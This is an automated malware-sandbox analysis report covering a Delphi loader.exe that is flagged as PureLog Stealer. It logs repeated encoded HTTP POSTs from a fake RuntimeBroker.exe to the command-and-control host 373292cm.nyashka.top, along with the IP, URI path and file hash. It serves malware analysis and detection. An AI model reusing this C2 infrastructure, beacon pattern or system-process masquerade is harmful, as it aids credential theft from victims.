Jan 11, 2025 06:44:44.126199961 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:44.256167889 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.6 | 57145 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:44.387500048 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:44:44.739110947 CET | 2544 | OUT | Data Raw: 5a 52 5c 50 54 47 54 5c 5b 5f 5a 51 59 54 58 54 57 51 5d 58 57 50 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZR\PTGT\[_ZQYTXTWQ]XWPS_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.88#='#3:=<?>+ /< 1/(;^ V5;>&F$.Y/)
Jan 11, 2025 06:44:45.016611099 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:45.146462917 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.6 | 57146 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:45.273010969 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:44:45.629918098 CET | 2544 | OUT | Data Raw: 5f 52 59 53 51 44 51 5d 5b 5f 5a 51 59 55 58 50 57 5b 5d 59 57 59 53 5d 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _RYSQDQ][_ZQYUXPW[]YWYS]\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/0#"<]"0**=/(>=(>'7,?W 8R(3Y 08&F$.Y/-
Jan 11, 2025 06:44:45.920058012 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:46.087923050 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:45 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.6 | 57147 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:46.253304958 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:44:46.598686934 CET | 2544 | OUT | Data Raw: 5f 57 59 52 54 43 54 58 5b 5f 5a 51 59 56 58 50 57 51 5d 5a 57 5a 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _WYRTCTX[_ZQYVXPWQ]ZWZSZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S..0'B!>##V">>+(-Z(- <!!(+:;" ,&F$.Y/!
Jan 11, 2025 06:44:46.901236057 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:47.034267902 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:46 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.6 | 57148 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:47.169780970 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:44:47.520479918 CET | 2544 | OUT | Data Raw: 5f 50 59 57 54 45 51 59 5b 5f 5a 51 59 52 58 5e 57 50 5d 5f 57 5b 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _PYWTEQY[_ZQYRX^WP]_W[SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.8<5>; 0*).3+6)=;Y704Q<^"09/&F$.Y/1
Jan 11, 2025 06:44:47.797544956 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:47.926518917 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.6 | 57149 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:47.964642048 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.6 | 57150 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:48.061866999 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:44:48.410943031 CET | 2544 | OUT | Data Raw: 5f 51 59 53 51 45 54 5a 5b 5f 5a 51 59 54 58 5e 57 5a 5d 5a 57 5c 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _QYSQETZ[_ZQYTX^WZ]ZW\SU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-80'B".+"3:*-(?6?[+[ <?R 1'(77.>&F$.Y/)
Jan 11, 2025 06:44:48.689635992 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:48.818295002 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:48 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.6 | 57151 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:49.083321095 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
Jan 11, 2025 06:44:49.442249060 CET | 2544 | OUT | Data Raw: 5a 51 59 52 51 42 54 5f 5b 5f 5a 51 59 54 58 5f 57 5a 5d 58 57 5f 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQYRQBT_[_ZQYTX_WZ]XW_S\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.^;#C6.$Y"3>>-0_+.?,7#S# P?4V5,.&F$.Y/)
Jan 11, 2025 06:44:49.712140083 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:49.842535973 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:49 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.6 | 57152 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:49.983584881 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
Jan 11, 2025 06:44:50.333131075 CET | 2544 | OUT | Data Raw: 5f 54 59 53 54 41 54 51 5b 5f 5a 51 59 5e 58 56 57 5c 5d 5e 57 5a 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _TYSTATQ[_ZQY^XVW\]^WZS^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S._;8![<Y#:).4(=)^+=7[ Z0 W +;Y 35Y/.&F$.Y/
Jan 11, 2025 06:44:50.630279064 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:50.762231112 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:50 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.6 | 57153 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:50.887586117 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:44:51.239242077 CET | 2544 | OUT | Data Raw: 5f 54 59 54 51 47 54 5d 5b 5f 5a 51 59 56 58 53 57 5e 5d 5d 57 5e 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _TYTQGT][_ZQYVXSW^]]W^SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-,#5>##3>>=<X>('Y4(70(*< 0!X8>&F$.Y/!
Jan 11, 2025 06:44:51.512744904 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:51.646188021 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.6 | 57154 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:51.837084055 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 11, 2025 06:44:52.192189932 CET | 2544 | OUT | Data Raw: 5a 55 59 54 54 40 54 5d 5b 5f 5a 51 59 51 58 57 57 5d 5d 59 57 50 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZUYTT@T][_ZQYQXWW]]YWPSU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.],">47![=>+>.>).<"?/R#1(S*)']7 >;&F$.Y/=
Jan 11, 2025 06:44:52.468055964 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:52.701010942 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[
Jan 11, 2025 06:44:52.701045990 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.6 | 57155 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:52.840137005 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.6 | 57156 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:53.076770067 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:53.426698923 CET | 1872 | OUT | Data Raw: 5f 57 59 52 54 41 51 5e 5b 5f 5a 51 59 5f 58 52 57 5d 5d 58 57 5d 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _WYRTAQ^[_ZQY_XRW]]XW]SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.8U#B6$]#>=Y+..++4<7P $?3_# %/&F$.Y/
                                                                                  Jan 11, 2025 06:44:53.714298010 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:53.848280907 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 25 0a 29 1b 36 10 26 2b 2b 0b 25 23 25 0e 3e 04 34 02 2a 03 03 5c 24 38 0f 5d 27 3e 27 0e 27 28 32 04 3f 07 2e 19 26 3c 38 03 2e 34 2b 5d 0c 13 22 5f 37 39 25 01 26 3f 3f 05 2b 28 24 06 21 05 3d 05 29 29 36 0c 3f 11 33 03 3c 39 2f 59 2b 14 26 1e 2f 06 26 05 3a 20 04 1d 20 3e 2b 52 0d 11 24 54 3f 3d 22 0c 3e 07 37 5f 21 28 28 00 30 13 07 0c 32 31 39 0f 27 07 3f 01 31 32 36 09 30 31 2d 54 26 05 2a 1c 32 3c 25 50 22 22 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: %)6&++%#%>4*\$8]'>''(2?.&<8.4+]"_79%&??+($!=))6?3<9/Y+&/&: >+R$T?=">7_!((0219'?12601-T&*2<%P""#T,"W3UV


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  121 | 192.168.2.6 | 57157 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:53.196543932 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:53.552054882 CET | 2544 | OUT | Data Raw: 5f 57 59 54 54 46 51 5d 5b 5f 5a 51 59 52 58 57 57 5a 5d 5c 57 59 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _WYTTFQ][_ZQYRXWWZ]\WYST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/(#> 4%+=$<=*<-#/471$W?:?73&,.&F$.Y/1
                                                                                  Jan 11, 2025 06:44:53.835568905 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:53.964438915 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  122 | 192.168.2.6 | 57158 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:54.087282896 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:54.735246897 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:45:05.548161030 CET | 2544 | OUT | Data Raw: 5f 53 59 57 51 47 54 58 5b 5f 5a 51 59 5e 58 5e 57 58 5d 5e 57 5f 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _SYWQGTX[_ZQY^X^WX]^W_S\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/#;C"-4><Y(X:(.'#,?R4++( !Y/&F$.Y/
                                                                                  Jan 11, 2025 06:45:05.812400103 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:45:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Target ID:0
                                                                                  Start time:00:42:46
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Users\user\Desktop\loader.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\loader.exe"
                                                                                  Imagebase:0x630000
                                                                                  File size:3'314'471 bytes
                                                                                  MD5 hash:2307CA04C2633D28345FB0580C77C2EC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Borland Delphi
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2162490833.0000000005BE3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2161189771.0000000007387000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:00:42:48
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                  Wow64 process (32bit):true
